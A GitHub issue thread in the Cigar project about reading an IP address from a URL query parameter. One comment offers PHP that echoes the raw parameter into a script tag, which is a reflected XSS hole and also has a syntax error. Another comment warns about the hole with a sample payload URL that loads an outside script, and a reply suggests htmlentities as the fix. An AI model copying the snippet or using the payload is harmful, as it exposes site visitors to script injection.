### ISSUE TITLE
How could I get the pathname and to connect?

### ISSUE THREAD

**Issue by iamtaeuk** [CigarProject/Cigar#456]
Hello,

I am trying to make my client to connect to an IP when it is set on the URL.
For example, [http://my-cigar-website/?ip=127.0.0.1:1234](http://my-cigar-website/?ip=127.0.0.1:1234) than it should connect to that IP.

I was trying to get the IP using `location.pathname` and `substring`, but should I approach it that way or use PHP?

Thanks :)

**Comment by HAlexTM** [comment]
I would suggest to do that with the index file (`index.html -> index.php`)

Put this after line n.113
```php
<?php
    if (isset($_GET['ip`]) {
        echo '<script>
            setserver("'.$_GET['ip'].'")
        </script>';
    }
?>
```

**Comment by MastaCoder** [comment]
Also strip tags when you are doing so with the method above. Since you are echoing it can cause security bugs, such as someone can simply do this:

http://my-cigar-website/?ip=%27);%3C/script%3E%3Cscript%20src=%27myscript.com/a.js%27%3E%27

And with those they can send the link to other people which has a malicious script attached to it.

**Comment by HAlexTM** [comment]
Of course @MastaCoder, if you're using it for a popular website you need to sanitize the variable, to do so use `htmlentities`
